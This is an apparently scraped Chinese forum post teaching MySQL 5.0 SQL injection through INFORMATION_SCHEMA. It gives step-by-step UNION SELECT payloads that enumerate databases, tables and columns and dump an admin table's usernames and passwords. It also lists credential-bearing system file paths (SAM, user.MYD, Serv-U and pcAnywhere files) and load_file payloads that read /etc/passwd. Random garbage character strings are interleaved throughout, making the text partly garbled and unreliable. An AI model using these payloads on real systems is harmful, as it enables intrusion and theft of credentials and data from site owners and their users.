mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
) z* P% V7 F' D3 {; D
! }7 E; H  l: ~  s% j6 `

; ^5 M: z' Q/ @& ]/ u7 Q. fMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
( a4 a$ p( Y6 p% A|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

7 [6 C* r6 ~5 M  Z: x|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
" A* U5 l+ N# E|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
& v0 @8 e3 P, v3 a
7 \  e8 {" O4 W/ y7 r8 v; ~+ E9 F#########################################################################
# R0 [. J8 c8 B3 a##
- B8 @/ q/ B0 k! d2 }7 s
, Q  ]# @4 \; n" `$ k! U0×001 获取系统信息:

6 d$ m/ r& b/ u& M) Qunion select 1,2,3,4,5,concat
3 y: |; K, H/ L" l) J  z(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
+ S' V! Z  v3 v4 e2 H  A  U(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

, m" p* l; H9 Y0 F6 B$ Z8 W1 a/*
( ~  X8 U; n2 v/ U# e1 N" b8 q3 y$ h
! f; T# H. k6 f, d$ d$ I- @3 O@@global.version_compile_os 获取系统版本
) t2 g% I( l0 p' _9 j( k# f; ?: n
@@datadir 数据库路径
8 w# t" H. F- g( V6 j* B5 {: p. @database() 当前数据库名称
0x3c62723e 换行HEX值

; t8 h; [5 q$ @& q*/
2 r7 p$ m$ \& m+ I# v+ M
######################################################################
% m" B- A! p3 b; I6 N" A+ ~- D. z4 ~
" E! Y3 a) @, ^; M* V9 f# t0×002 获取表名
0 `  n3 h3 l+ Y
0 H8 l) C/ c/ Q! j+ sunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
) R4 @. [# U4 s( minformation_schema.tables where table_schema=0x67617264656e /*
& T* q7 C* ]# T3 P) W6 j
/*

* G# e" W  N+ X. Q$ ]! E' d. g7 S! E% T2 _0x67617264656e 为当前数据库名

6 ?' Z* C, k( |4 Igroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/
, B7 h: @- v' D' D% a: B: ^
' u& t$ |" D( U5 g) K' E######################################################################
* Y  j: i) c1 d, c) A
0×003 获取字段

. v# f+ }( k" i  @union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and


* z5 {+ _: c* x1 C* G  Y2 a# F4 ?table_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
9 @: b! o5 H) t8 A
0x61646d696e ->选择一个表

! u5 x4 B% X$ e8 E& z. D( m0x67617264656e ->数据库名

*/
* t. |) ]1 G3 B# J% n+ t8 l
( X: G% U# i0 Y5 Y# E! t#####################################################################
$ D1 Y5 P) |# H. T& J, b- h
0×004 获取数据

7 a% Y) f: t3 l+ Z# Wunion select 1,2,3
4 z9 ~/ z6 v* b2 d& N; t: y. u,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
) d3 f( f( c4 F: D(adpassword),6,7,8 from admin

3 ~( L; e) }$ \7 {/*

1 v- M# w0 z5 Q$ }3 I0x3c62723e 换行符号HEX编码
4 r- K3 X9 n9 S% x0 m
# n8 c8 V. J' {  U9 T1 wgroup_concat 同时获得该字段所有数据

2 \& i- H2 @2 Z+ h, r*/
; h+ C! k+ X' @% r0 Y2 G( ]
- x3 M% h$ O$ P; X
' w' ~6 L  I% U8 v3 h


顺便添加一些mysql注入时非常有用的一些东西
/ J0 ~1 `; P/ b
, G2 p- s3 Q$ J- o简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
; j) x) }1 m5 k* @, G& j  m
1:system_user() 系统用户名
2:user()        用户名
3:current_user()  当前用户名
/ f1 ^# V3 w: a) F" q8 o; s: l! [4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
/ L7 p8 ]9 L! M/ Q6 h7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
1 _1 r5 U' ?8 d2 g( X% d) |6 q9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
( W4 L# p: K! o! }$ ac:/windows/php.ini   //php配置信息
* D2 l: l6 m! [! m( |* a2 J7 Lc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
5 b7 ?0 U+ r; I7 @9 T, q5 nc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
9 ~; ~0 X+ e6 R. SC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
4 b: a5 |2 R; h8 G: H//存储了pcAnywhere的登陆密码
' }% f( A) }6 H' g* D% xc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
6 X2 b' p& l: b5 C8 y1 w1 f# pc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
  X( T- U/ x$ m" Q2 S. H
5 [4 ^$ a* e9 w# t. o* c0 i/ h5 T
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
( _8 x" m+ r3 I) h% S. ]1 F" Ad:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
5 i# ], v# \  d$ U& lc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
, j# Y# U# E' W3 o7 c8 E* K3 _C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

; i: c7 }, ?  r7 oLUNIX/UNIX下:
( L4 D" n/ @. U) B4 x% y/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
) @: I5 Q+ O, b: I/etc/sysconfig/iptables //从中得到防火墙规则策略
$ `' e: D, H  X) Z! d. T/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
9 K+ E& D4 u  J0 B$ O/etc/redhat-release //系统版本
/etc/issue
6 g8 _1 l: d9 @; Y$ H. s/etc/issue.net
  M0 k: S5 P, I3 M/usr/local/app/php5/lib/php.ini //PHP相关设置
0 q' P3 f: n* O/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
" I* ?  ]; z, e0 F2 S/ x2 g% i/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
" W2 V: o% {6 g# ?/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
' w) j0 {6 A9 l: h7 W/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
' C  E2 J. e8 V* _9 F- b2 ?/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
) J$ L# J* P' i- P$ [4 x/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
0 X/ r7 B  m& B5 ]9 j9 x/etc/sysconfig/iptables 查看防火墙策略
1 M! [3 P, `! J9 k3 _) G! d0 gload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
) d5 x: V0 V  c* F8 Preplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
0 s# b9 m" o, [2 [8 I( e上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
2 Q' y* V! [$ `+ O2 Z" T/ i9 S